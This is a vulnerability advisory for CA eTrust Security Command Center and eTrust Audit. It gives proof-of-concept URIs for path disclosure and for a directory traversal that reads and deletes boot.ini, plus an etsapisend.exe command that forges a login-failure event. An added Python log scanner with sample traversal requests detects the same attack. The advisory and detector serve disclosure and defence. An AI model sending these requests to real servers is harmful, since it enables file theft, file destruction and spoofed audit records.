CA eTrust Security Command Center and eTrust Audit Multiple Vulnerabilities

Attackers may exploit these issues using a web browser or the 'etsapisend.exe' executable.

The following URI demonstrates the path-disclosure issue:
https://www.example.com:8080/etrust/servlet/ePPIServlet?PIProfile=eAV_Report's&PIName=Generate+Pre-7.1+Report+Data&profile= Threat+Management&node=

The following URI demonstrates the arbitrary-file-access/removal issue by retrieving 'boot.ini' and then deleting it:
https://www.example.com:8080/etrust/servlet/eSMPAuditServlet?verb=getadhochtml&eSCCAdHocHtmlFile=../../../../../../../boot.ini
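As an added detection example (not part of the advisory or of the CA product), the following Python script scans web-server access-log lines for requests to the eSMPAuditServlet whose eSCCAdHocHtmlFile parameter walks above the servlet's own directory, after URL-decoding and normalising backslashes. The Common Log Format layout and the sample log entries are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (Common Log Format); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2010:10:01:02 +0000] "GET /etrust/servlet/eSMPAuditServlet?verb=getadhochtml&eSCCAdHocHtmlFile=report1.html HTTP/1.1" 200 5120
10.0.0.9 - - [12/Mar/2010:10:02:17 +0000] "GET /etrust/servlet/eSMPAuditServlet?verb=getadhochtml&eSCCAdHocHtmlFile=../../../../../../../boot.ini HTTP/1.1" 200 210
10.0.0.9 - - [12/Mar/2010:10:02:30 +0000] "GET /etrust/servlet/eSMPAuditServlet?verb=getadhochtml&eSCCAdHocHtmlFile=..%2F..%2Fwinnt%2Fwin.ini HTTP/1.1" 200 180
10.0.0.7 - - [12/Mar/2010:10:03:00 +0000] "GET /etrust/servlet/ePPIServlet?PIProfile=eAV_Report&PIName=Generate HTTP/1.1" 200 900
"""

# client, identd, user, [timestamp], "METHOD target protocol", status
REQUEST_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
WATCHED_SERVLET = "/etrust/servlet/eSMPAuditServlet"
FILE_PARAM = "eSCCAdHocHtmlFile"


def escapes_base_dir(value: str) -> bool:
    """True if the file name climbs above the directory it is resolved from."""
    depth = 0
    for part in value.replace("\\", "/").split("/"):
        if part in ("", "."):
            continue
        if part == "..":
            depth -= 1
            if depth < 0:          # more '..' than real components: escaped
                return True
        else:
            depth += 1
    return False


def find_traversal_requests(log_text: str) -> list:
    """Return one finding per request whose file parameter escapes the base dir."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if url.path != WATCHED_SERVLET:
            continue
        # parse_qs URL-decodes each value once, so %2F becomes '/' here
        for value in parse_qs(url.query, keep_blank_values=True).get(FILE_PARAM, []):
            if escapes_base_dir(value):
                findings.append({"client": m.group("client"), "ts": m.group("ts"),
                                 "status": m.group("status"), "file": value})
    return findings
```

A 200 status on a flagged request suggests the file was served (and, per the advisory, removed), so those entries warrant follow-up on the host.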

The following command-line example will send a login-failure event:
etsapisend.exe -nod $dstIP -cat "System Access" -opr Logon -sta F -nam NT-Security -loc \\Domain\IIS_Server -usr System -evt 70 -src Security -nid 529 -inf "Logon Failure"

Copyright 2010, SecurityFocus